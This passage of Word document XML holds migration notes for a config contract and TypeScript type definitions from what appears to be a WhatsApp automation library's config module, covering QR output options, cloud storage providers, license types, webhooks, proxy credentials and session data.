        </w:rPr>
        <w:t xml:space="preserve">- browser behavior (`multiDevice`, `useChrome`, `userDataDir`, `chromiumArgs`, viewport, devtools)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- launcher UX (`popup`, `disableSpins`, logging)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- runtime/integration behavior (webhooks, event mode, cloud upload, preprocessors, API/server flags)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Migration note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 lot of legacy complexity exists because several modes were optional. Based on current 2026 assumptions:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - multi-device should be treated as baseline, not an option</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - env absorption should not be gated behind Docker-specific behavior</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - socket/integration transport should be treated as default infrastructure rather than an opt-in side channel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That means this file is a strong candidate for config-contract simplification during migration.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config contract should express launch/runtime policy clearly enough that callers do not need source dives to understand defaults.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Mutually obsolete or contradictory flags should be removed or normalized before launch.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- v5 should treat env/config/CLI sources with a predictable precedence model.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Session/runtime configuration should separate core launch concerns from optional integration concerns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Multi-device should be modeled as baseline behavior, not an optional compatibility path.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Socket/integration mode should be representable as default infrastructure rather than bolt-on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Central config contract | Preserve | Still needed for runtime clarity. |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">| Legacy compatibility flags | Not carried forward | Some toggles should disappear in v5. |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">| Policy simplification | Intentionally changed | v5 should reduce contradictory options.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type definitions, enums, interface contracts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Outputs: canonical runtime/config surface.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Side effects: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Contradictory config semantics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Ambiguous default policy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Obsolete flag drift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launcher, CLI, client, and integrations share this contract or a mapped successor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Guarantees: a single typed place exists to understand configuration meaning.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`OPTIONS_DECLARED -&gt; OPTIONS_RESOLVED_BY_CALLERS`</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packages/legacy-documented/src/api/model/config.pseudo.md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packages/legacy-documented/src/api/model/config.ts ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { AxiosRequestConfig } from 'axios';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { ConfigLogTransport } from '../../logging/logging';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { Base64 } from "./aliases";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { SimpleListener } from './events';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different types of qr code output.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QRFormat {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    PNG = 'png',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    JPEG = 'jpeg',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    WEBM = 'webm'</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CLOUD_PROVIDERS {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    GCP = "GCP",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    WASABI = "WASABI",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    AWS = "AWS",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    CONTABO = "CONTABO",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    DO = "DO",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    MINIO = "MINIO"</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DIRECTORY_STRATEGY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E.g `/2021-08-16/`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DATE = "DATE",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E.g `/447123456789/`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 =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E.g `/447123456789/2021-08-16/`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CHAT_DATE = "CHAT_DATE",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E.g `/2021-08-16/447123456789/`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DATE_CHAT = "DATE_CHAT"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type SessionId = string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">type LicenseKey = string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">type HostAccountNumber = `${number}`;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">type HostAccountNumberOrSessionID = HostAccountNumber | SessionId;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">type LicenseKeyConfigObject = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    [key: HostAccountNumberOrSessionID]: LicenseKey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type LicenseKeyConfigFunctionReturn = LicenseKeyConfigObject | LicenseKey</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">type LicenseKeyConfigFunction = (sessionId?: SessionId, number?: HostAccountNumber) =&gt; LicenseKeyConfigFunctionReturn | Promise&lt;LicenseKeyConfigFunctionReturn&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">type LicenseKeyConfig = LicenseKeyConfigFunction | LicenseKeyConfigObject | LicenseKey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available languages for the host security notification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NotificationLanguage {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    PTBR = 'pt-br',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    ENGB = 'en-gb',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    DEDE = 'de-de',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    IDID = 'id-id',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    ITIT = 'it-it',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    NLNL = 'nl-nl',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    ES = 'es',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OnError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it as a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AS_STRING = "AS_STRING",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not log anything, just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RETURN_FALSE = "RETURN_FALSE",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throw the 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 = "THROW",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the error and return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LOG_AND_FALSE = "LOG_AND_FALSE",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Log the error AND return the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LOG_AND_STRING = "LOG_AND_STRING",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 the error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RETURN_ERROR = "RETURN_ERROR",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 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NOTHING = "NOTHING"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set values of quality you can set for the quality of the qr code output. Ten being the highest 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QRQuality {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    ONE = 0.1,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    TWO = 0.2,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    THREE = 0.3,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    FOUR = 0.4,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    FIVE = 0.5,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    SIX = 0.6,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    SEVEN = 0.7,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    EIGHT = 0.8,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    NINE = 0.9,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    TEN = 1.0,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LicenseType {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    CUSTOM = "CUSTOM",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    B2B_RESTRICTED_VOLUME_LICENSE = "B2B_RESTRICTED_VOLUME_LICENSE",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    INSIDER = "Insiders Program",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    TEXT_STORY = "Text Story License Key",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    IMAGE_STORY = "Image Story License Key",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    VIDEO_STORY = "Video Story License Key",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    PREMIUM = "Premium License Key",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    NONE = "NONE"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SessionData {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    WABrowserId?: string,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    WASecretBundle?: string,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    WAToken1?: string,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    WAToken2?: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DevTools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Username for devtools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Password for devtools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EventPayload {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    //epoch timestamp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    ts: number;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    //session id</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//id of the webhook event. Useful for idempotency</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//the event type</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    event: SimpleListener;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    //the actual data emitted from the original event</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    data: any;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    //The event payload can have other undocumented properties</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    [k: string]: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Webhook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endpoint to send (POST) the event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optional AxiosRequestConfig to use for firing the webhook event. This can be useful if you want to add some authentication when POSTing data to your server.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example, if your webhook requires the username `admin` and password `1234` for authentication, you can set the requestConfig to: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auth: {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     *     username: "admin",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     *     password: "1234",</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note, for security reasons, this is not returned when listing webhooks however it is returned when registering a webhook for verification purposes.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requestConfig?: AxiosRequestConfig;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given webhook setup. Use this ID with [[removeWebhook]]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events that are registered to be sent to this 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events: SimpleListener[];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 when the webhook was registered in epoch time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ts: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interface ProxyServerCredentials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protocol on which the proxy is running. E.g `http`, `https`, `socks4` or `socks5`. This is optional and can be automatically determined from the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protocol?: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Proxy Server address. This can include the port e.g '127.0.0.1:5005'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Username for Proxy Server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username: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Password for Proxy Server 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password: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ConfigObject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The authentication object (as a JSON object or a base64 encoded string) that is required to migrate a session from one instance to another or to just restart an existing instance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * This sessionData is provided in a generated JSON file (it's a json file but contains the JSON data as a base64 encoded string) upon QR scan or an event.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You can capture the event like so:</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import {create, ev} from '@open-wa/wa-automate';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ev.on('sessionData.**', async (sessionData, sessionId) =&gt;{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     *          console.log(sessionId, sessionData)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//or as base64 encoded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ev.on('sessionDataBase64.**', async (sessionDatastring, sessionId) =&gt;{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
